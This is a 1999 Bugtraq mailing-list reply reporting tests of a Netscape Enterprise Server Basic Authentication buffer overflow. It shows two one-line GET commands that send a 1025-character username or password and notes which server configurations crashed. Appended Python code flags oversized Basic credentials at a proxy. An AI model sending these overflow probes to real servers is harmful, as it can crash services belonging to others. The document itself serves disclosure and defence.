[12841] in bugtraq
Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise
daemon@ATHENA.MIT.EDU (Doug Monroe)
Fri Dec 3 15:12:50 1999
Message-Id: <3.0.3.32.19991202131732.006a39cc@postoffice.worldnet.att.net>
Date: Thu, 2 Dec 1999 13:17:32 -0500
Reply-To: Doug Monroe <monwel@INTERHACK.NET>
From: Doug Monroe <monwel@INTERHACK.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
RE:
> ISS Security Advisory
> December 1, 1999
> Buffer Overflow in Netscape Enterprise and FastTrack Authentication
> Procedure
I made a few simple pokes with variants of perl LWP's 'GET' function at
areas of 2 NES 3.x servers that are protected with Basic Authentication.
For example:
$ GET -C username:`perl -e 'print "A"x1025'` http://server/private-path
$ GET -C `perl -e 'print "A"x1025'`:password http://server/private-path
Solaris 2.6/NES 3.5.1 (and 3.6.3):
username:LONGpw -> http://server/private-path - NO KILL
LONGusername:pw -> http://server/private-path - NO KILL
NT4/SP4/NES 3.6.2:
username:LONGpw -> http://server/private-path - NO KILL
LONGusername:pw -> http://server/private-path - KILL
Potentially important diffs/notes:
On the Solaris box, the private area was config'd with .nsconfig/NCSA-style ACL.
On the NT, the private area was protected using local-db ACL, not NCSA-style.
I have not tried poking a local-db/LDIF protected area on Solaris.
I have not tried poking a .nsconfig/NCSA-style area on NT.
I have not tried poking at the admin server of either box.
--
Doug Monroe
www.interhack.net
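The probes above send Basic Authentication credentials with a 1025-byte username or password. A defender in front of such a server (a reverse proxy, a WAF rule, or an offline review of captured requests) can flag or reject oversized Basic credentials before they reach the authentication code. The following is an added example, not code from the post or from Netscape; it decodes the Authorization header, measures each field, and reports anything over a threshold. The 1024-byte threshold, the sample requests and the client addresses are constructed for illustration and are not values documented for NES.

```python
import base64
import binascii

# Length above which a Basic Auth username or password is treated as anomalous.
# 1024 is an assumed value chosen to match the 1025-byte probes in the post;
# it is not a limit documented for Netscape Enterprise Server.
MAX_FIELD_LEN = 1024


def parse_basic_auth(header_value):
    """Return (username, password) from an 'Authorization: Basic ...' value,
    or None when the value is not a well-formed Basic credential."""
    parts = header_value.strip().split(None, 1)
    if len(parts) != 2 or parts[0].lower() != "basic":
        return None
    try:
        raw = base64.b64decode(parts[1].strip(), validate=True)
    except (binascii.Error, ValueError):
        return None
    # RFC 2617: user-pass = userid ":" password, and userid may not contain ':'.
    # Only the first colon separates the fields; later colons belong to the password.
    user, sep, password = raw.partition(b":")
    if not sep:
        return None
    # latin-1 keeps a 1:1 byte-to-character mapping, so len() is the byte length.
    return user.decode("latin-1"), password.decode("latin-1")


def check_basic_auth(header_value, max_len=MAX_FIELD_LEN):
    """Classify one Basic credential. Returns the field lengths, a 'suspicious'
    flag and a human-readable reason (empty when nothing is wrong)."""
    creds = parse_basic_auth(header_value)
    if creds is None:
        return {"user_len": None, "pass_len": None,
                "suspicious": True, "reason": "malformed Basic credential"}
    user, password = creds
    reasons = []
    if len(user) > max_len:
        reasons.append(f"username length {len(user)} exceeds {max_len}")
    if len(password) > max_len:
        reasons.append(f"password length {len(password)} exceeds {max_len}")
    return {"user_len": len(user), "pass_len": len(password),
            "suspicious": bool(reasons), "reason": "; ".join(reasons)}


def build_basic(user, password):
    """Helper used only to construct sample headers for this example."""
    token = base64.b64encode(f"{user}:{password}".encode("latin-1"))
    return "Basic " + token.decode("ascii")


# Constructed sample requests: (client address, Authorization header value).
# They mirror the post's two probe shapes (LONGusername:pw and username:LONGpw)
# plus a normal login and a malformed header.
SAMPLE_REQUESTS = [
    ("10.0.0.5", build_basic("alice", "s3cret")),
    ("10.0.0.9", build_basic("A" * 1025, "pw")),
    ("10.0.0.9", build_basic("bob", "A" * 1025)),
    ("10.0.0.7", "Basic not*base64"),
]


def scan_requests(requests, max_len=MAX_FIELD_LEN):
    """Return [(client, verdict), ...] for every request whose Basic credential
    is oversized or malformed; clean requests are omitted."""
    flagged = []
    for client, header_value in requests:
        verdict = check_basic_auth(header_value, max_len)
        if verdict["suspicious"]:
            flagged.append((client, verdict))
    return flagged


if __name__ == "__main__":
    for client, verdict in scan_requests(SAMPLE_REQUESTS):
        print(f"{client}: {verdict['reason']}")
```

Decoding before measuring matters: the base64 form of a 1025-byte username is about 1368 characters, so a rule that only looks at the raw header length would need a different threshold and would not tell an oversized username from an oversized password. Rejecting on the proxy with a 4xx response keeps the probe from ever reaching the server's authentication routine, which is where the advisory places the overflow.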